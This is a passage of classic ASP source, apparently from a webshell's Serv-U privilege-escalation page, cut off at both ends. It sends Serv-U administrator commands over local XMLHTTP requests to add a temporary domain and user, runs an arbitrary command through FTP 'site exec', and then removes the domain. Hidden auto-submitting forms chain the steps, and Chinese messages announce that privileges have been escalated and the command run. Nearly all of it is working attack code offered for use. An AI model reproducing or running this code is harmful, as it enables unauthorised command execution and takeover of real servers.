newuser=replace(newuser,"c:",f)
if action1 = 1 then
set a=Server.CreateObject("Microsoft.XMLHTTP")
a.open "GET", "http://127.0.0.1:" & port & "/QQ44997/upadmin/s1",True, "", ""
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
set session("a")=a
RRS "<form method=""post"" name=""goldsun"">"
RRS "<input name=""u"" type=""hidden"" id=""u"" value="""&user&"""></td>"
RRS "<input name=""p"" type=""hidden"" id=""p"" value="""&pass&"""></td>"
RRS "<input name=""port"" type=""hidden"" id=""port"" value="""&port&"""></td>"
RRS "<input name=""c"" type=""hidden"" id=""c"" value="""&cmd&""" size=""50"">"
RRS "<input name=""f"" type=""hidden"" id=""f"" value="""&f&""" size=""50"">"
RRS "<input name=""action1"" type=""hidden"" id=""action1"" value=""2""></form>"
RRS "<script language=""javascript"">"
RRS "document.write(""<center>正在连接 127.0.0.1:"&port&",使用用户名: "&user&",口令:"&pass&"...<center>"");"
RRS "setTimeout(""document.all.goldsun.submit();"",4000);"
RRS "</script>"
elseif action1 = 2 then
set b=Server.CreateObject("Microsoft.XMLHTTP")
b.open "GET", "http://127.0.0.1:" & ftpport & "/QQ44997/upadmin/s2", True, "", ""
b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
set session("b")=b
RRS "<form method=""post"" name=""goldsun"">"
RRS "<input name=""u"" type=""hidden"" id=""u"" value="""&user&"""></td>"
RRS "<input name=""p"" type=""hidden"" id=""p"" value="""&pass&"""></td>"
RRS "<input name=""port"" type=""hidden"" id=""port"" value="""&port&"""></td>"
RRS "<input name=""c"" type=""hidden"" id=""c"" value="""&cmd&""" size=""50"">"
RRS "<input name=""f"" type=""hidden"" id=""f"" value="""&f&""" size=""50"">"
RRS "<input name=""action1"" type=""hidden"" id=""action1"" value=""3""></form>"
RRS "<script language=""javascript"">"
RRS "document.write(""<center>正在提升权限,请等待...<center>"");"
RRS "setTimeout(""document.all.goldsun.submit();"",4000);"
RRS "</script>"
elseif action1 = 3 then
set c=Server.CreateObject("Microsoft.XMLHTTP")
c.open "GET", "http://127.0.0.1:" & port & "/QQ44997/upadmin/s3", True, "", ""
c.send loginuser & loginpass & mt & deldomain & quit
set session("c")=c
RRS "<center>提权完毕,已执行了命令:<br><font color=red>"&cmd&"</font><br><br>"
RRS "<input type=""button"" value="" 返回继续 "" onClick=location.href=""?Action=Servu"">"
RRS "</center>"
else
on error resume next
set a=session("a")
set b=session("b")
set c=session("c")
a.abort
Set a = Nothing
b.abort
Set b = Nothing
c.abort
Set c = Nothing
RRS "<center><form method=post name=goldsun action=""?Action=Servu"">"
RRS "<table width=""494"" height=""163"" border=""1"" cellpadding=""0"" cellspacing=""1"" bordercolor=""#666666"">"
RRS "<tr align=""center"" valign=""middle"